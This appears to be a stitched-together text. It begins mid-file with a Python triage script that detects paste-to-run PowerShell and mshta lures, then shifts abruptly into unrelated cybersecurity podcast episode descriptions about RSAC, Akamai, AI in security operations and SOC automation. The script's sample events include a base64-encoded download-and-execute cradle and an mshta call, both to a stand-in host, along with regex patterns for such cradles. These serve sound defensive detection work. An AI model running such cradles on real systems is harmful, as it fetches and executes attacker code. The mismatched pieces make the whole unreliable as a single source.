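# PowerShell that fetches a second stage. Event 1 is the mshta variant.
# Events 2 and 3 are benign: a SYSTEM-run management script and a user's
# ordinary interactive PowerShell session.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe",
     "CommandLine": "powershell -w hidden -enc "
                    + base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe",
     "CommandLine": "mshta http://example.invalid/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\ConfigMgr\ccmexec.exe",
     "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe",
     "CommandLine": "powershell Get-ChildItem C:\\Users\\jdoe\\Documents"},
]

# Hypothetical indicator set: parents that mean "a human typed or pasted this"
# (the Run dialog is hosted by explorer.exe) and the script hosts abused by
# paste-to-run lures. A production rule would be tuned to the environment.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Common spellings of powershell.exe's -EncodedCommand and -WindowStyle flags.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w\w*\s+h(?:idden)?\b")
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                             r"|invoke-restmethod|\birm\b|net\.webclient|https?://")
INVOKE_EXPRESSION = re.compile(r"(?i)invoke-expression|\biex\b")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    # powershell.exe expects the script UTF-16LE encoded before base64.
    return raw.decode("utf-16le", errors="replace")


def indicators(event):
    """List the indicator names that fire on one process-creation event."""
    reasons = []
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmdline = event["CommandLine"]
    if parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("interactive-parent")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
    # Match cradles in both the raw command line and the decoded payload,
    # so base64 does not hide the download.
    text = cmdline + " " + (decoded or "")
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden-window")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download-cradle")
    if INVOKE_EXPRESSION.search(text):
        reasons.append("invoke-expression")
    return reasons


def triage(events):
    """Return alert records for events that look like paste-to-run execution.

    Alerts require an interactive parent plus at least one more indicator, so
    a scheduled script under SYSTEM or a user's plain PowerShell session is
    left alone. Fetching code or hiding the payload raises severity to high.
    """
    findings = []
    for i, ev in enumerate(events):
        reasons = indicators(ev)
        if "interactive-parent" not in reasons or len(reasons) < 2:
            continue
        severity = "high" if ("download-cradle" in reasons
                              or "encoded-command" in reasons) else "medium"
        findings.append({"index": i, "user": ev["User"],
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

Keeping the decoded -EncodedCommand text on the alert, rather than the base64 blob, is what lets an analyst see the cradle at a glance and act inside the window Kenneth describes; in a real deployment the parent set would also grow to cover browsers and whatever else hosts paste-to-run lures in the environment.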
The RSA Conference has long served as a meeting point for innovation and collaboration in cybersecurity—and in this pre-RSAC episode, ITSPmagazine co-founders Marco Ciappelli and Sean Martin welcome Akamai's Rupesh Chokshi to the conversation. With RSAC 2025 on the horizon, they discuss Akamai's presence at the event and dig into the challenges and opportunities surrounding AI, threat intelligence, and enterprise security. Chokshi, who leads Akamai's Application Security business, describes a landscape marked by explosive growth in web and API attacks—and a parallel shift as enterprises embrace generative AI. The double-edged nature of AI is central to the discussion: while it offers breakthrough productivity and automation, it also creates new vulnerabilities. Akamai's dual focus, says Chokshi, is both using AI to strengthen defenses and securing AI-powered applications themselves. The conversation touches on the scale and sophistication of modern threats, including an eye-opening stat: Akamai is now tracking over 500 million large language model (LLM)-driven scraping requests per day. As these threats extend from e-commerce to healthcare and beyond, Chokshi emphasizes the need for layered defense strategies and real-time adaptability. Ciappelli brings a sociological lens to the AI discussion, noting the hype-to-reality shift the industry is experiencing. “We're no longer asking if AI will change the game,” he suggests. “We're asking how to implement it responsibly—and how to protect it.” At RSAC 2025, Akamai will showcase a range of innovations, including updates to its Guardicore platform and new App & API Protection Hybrid solutions. Their booth (6245) will feature interactive demos, theater sessions, and one-on-one briefings. The Akamai team will also release a new edition of their State of the Internet report, packed with actionable threat data and insights. The episode closes with a reminder: in a world that's both accelerating and fragmenting, cybersecurity must serve not just as a barrier—but as a catalyst. “Security,” says Chokshi, “has to enable innovation, not hinder it.”
⸻
Keywords: RSAC 2025, Akamai, cybersecurity, generative AI, API protection, web attacks, application security, LLM scraping, Guardicore, State of the Internet report, Zero Trust, hybrid digital world, enterprise resilience, AI security, threat intelligence, prompt injection, data privacy, RSA Conference, Sean Martin, Marco Ciappelli
______________________
Guest: Rupesh Chokshi, SVP & GM, Akamai https://www.linkedin.com/in/rupeshchokshi/
Hosts: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber] | On ITSPmagazine: https://www.itspmagazine.com/sean-martin
Marco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society Podcast & Audio Signals Podcast | On ITSPmagazine: https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli
____________________________
This Episode's Sponsors
AKAMAI: https://itspm.ag/akamailbwc
____________________________
Resources
Learn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsa-conference-usa-2025-rsac-san-francisco-usa-cybersecurity-event-infosec-conference-coverage
Rupesh Chokshi Session at RSAC 2025: The New Attack Frontier: Research Shows Apps & APIs Are the Targets - [PART1-W09]
In this episode of Detection at Scale, Matthew Martin, Founder of Two Candlesticks, shares practical approaches for implementing AI in security operations, particularly for smaller companies and those in emerging markets. Matthew explains how AI chatbots can save analysts up to 45 minutes per incident by automating initial information gathering and ticket creation. Matthew's conversation with Jack explores critical implementation challenges, from organizational politics to data quality issues, and the importance of making AI decisions auditable and explainable. Matthew emphasizes the essential balance between AI capabilities and human intuition, noting that although AI excels at analyzing data, it lacks understanding of intent. He concludes with valuable advice for security leaders on business alignment, embracing new technologies, and maintaining human connection to prevent burnout. Topics discussed: Implementing AI chatbots in security operations can save analysts approximately 45 minutes per incident through automated information gathering and ticket creation. Political challenges within organizations, particularly around AI ownership and budget allocation, often exceed technical challenges in implementation. Data quality and understanding are foundational requirements before implementing AI in security operations to ensure effective and reliable results. The balance between human intuition and AI capabilities is crucial, as AI excels at data analysis but lacks understanding of intent behind actions. Security teams should prioritize making AI decisions auditable and explainable to ensure transparency and accountability in automated processes. Generative AI lowers barriers for both attackers and defenders, requiring security teams to understand AI capabilities and limitations. In-house data processing and modeling are preferable for sensitive customer data, with clear governance frameworks for privacy and security. Future security operations will likely automate many Tier 1 and Tier 2 functions, allowing analysts to focus on more complex issues. Security leaders must understand their business thoroughly to build controls that align with how the company generates revenue. Technology alone cannot solve burnout issues; leaders must understand their people at a human level to create sustainable efficiency improvements.
In a conversation that sets the tone for this year's RSA Conference, Steve Wilson shares a candid look at how AI is intersecting with cybersecurity in real and measurable ways. Wilson, who also leads the OWASP Top 10 for Large Language Models project and recently authored a book published by O'Reilly on the topic, brings a multi-layered perspective to a discussion that blends strategy, technology, and organizational behavior. Wilson's session title at RSA Conference—“Are the Machines Learning, or Are We?”—asks a timely question. Security teams are inundated with data, but without meaningful visibility—defined not just as seeing, but understanding and acting on what you see—confidence in defense capabilities may be misplaced. Wilson references a study conducted with IDC that highlights this very disconnect: organizations feel secure, yet admit they can't see enough of their environment to justify that confidence. This episode tackles one of the core paradoxes of AI in cybersecurity: it offers the promise of enhanced detection, speed, and insight, but only if applied thoughtfully. Generative AI and large language models (LLMs) aren't magical fixes, and they struggle with large datasets. But when layered atop refined systems like user and entity behavior analytics (UEBA), they can help junior analysts punch above their weight—or even automate early-stage investigations. Wilson doesn't stop at the tools. He zooms out to the business implications, where visibility, talent shortages, and tech complexity converge. He challenges security leaders to rethink what visibility truly means and to recognize the mounting noise problem. The industry is chasing 40% more CVEs year over year—an unsustainable growth curve that demands better signal-to-noise filtering. At its heart, the episode raises important strategic questions: Are businesses merely offloading thinking to machines? Or are they learning how to apply these technologies to think more clearly, act more decisively, and structure teams differently? Whether you're building a SOC strategy, rethinking tooling, or just navigating the AI hype cycle, this conversation with Steve Wilson offers grounded insights with real implications for today—and tomorrow.
All links and images for this episode can be found on CISO Series. This week's episode is hosted by me, David Spark, producer of CISO Series, and Christina Shannon, CIO, KIK Consumer Products. Joining us is Jim Bowie, CISO, Tampa General Hospital. In this episode: A journey, not a destination; The difference between pressure and stress; Fighting commodity deepfakes; Getting leadership on the same page. HUGE thanks to our sponsors, Proofpoint, Cofense, & KnowBe4. With an integrated suite of cloud-based cybersecurity and compliance solutions, Proofpoint helps organizations around the world stop targeted threats, safeguard their data, and make their users more resilient against cyber attacks. Discover cutting-edge security insights and industry trends from leading experts at Proofpoint Power Series—a monthly virtual event designed to empower the security community. Learn more at proofpoint.com Powered by 35 million trained employee reporters, the exclusive Cofense® PhishMe® Email Security Awareness Training with Risk Validation and Phishing Threat Detection and Response Platforms combine robust training with advanced tools for phishing identification and remediation. Together, our solutions empower organizations to identify, combat, and eliminate phishing threats in real-time. Learn more at cofense.com KnowBe4's PhishER Plus is a lightweight SOAR platform that streamlines threat response for high-volume, potentially malicious emails reported by users. It automatically prioritizes messages, helping InfoSec and Security Operations teams quickly address the most critical threats, reducing inbox clutter and enhancing overall security efficiency. Learn more at knowbe4.com
➡ Build, run, and monitor workflows with Tines at: tines.com In this episode, I speak with Matt Muller, Field CISO at Tines, about how automation and AI are transforming security operations at scale. We talk about: • Tines' Mission to Eliminate Manual Security Work Through Automation: How Tines helps security teams streamline incident response and workflow automation without needing to write code, saving time and reducing burnout. • Applying AI to Security Operations and Analyst Workflows: How AI is used in phishing analysis, threat intel reporting, and data transformation—integrated safely into workflows using tools like Workbench with private LLMs. • Tines Workbench and the Future of Agentic AI: How Workbench combines chat with deterministic automation to help analysts take action securely, and how Tines is exploring agentic AI to take automation even further. Chapters: 00:00 - How Tines Automates Security to Solve SOC Burnout 07:19 - The AI Arms Race: How Attackers and Defenders Are Evolving 09:08 - Why Security Still Comes Down to Workflow, Logging, and Action 13:41 - How CISOs Are Balancing AI Adoption and Enterprise Risk 17:36 - Using AI in Tines to Transform and Automate Security Workflows 20:40 - How AI Detects Business Email Compromise Better Than Rules 25:26 - From Security to Data Pipelines: Tines as Workflow Orchestration 28:59 - Inside Workbench: Secure AI-Powered Chat for Analysts 36:00 - Automating Phishing Investigations with Trusted Tool Integrations 39:19 - Where to Learn More and Try Tines for Free Become a Member: https://danielmiessler.com/upgrade See omnystudio.com/listener for privacy information.
This episode is a recording of a live interview held on stage at Blu Ventures' Cyber Venture Forum in February. A huge shoutout and thank you to the Blu Ventures team for putting together an awesome event. Bricklayer is building an AI-based agent to assist with security operations workflows. Before Bricklayer, Adam founded ThreatConnect which he led for over a decade. In the conversation we discuss his learnings from his experience at ThreatConnect, acquiring vs. building a new capability, and how he thinks about competition in the AI SOC space.Website: bricklayer.aiSponsor: VulnCheck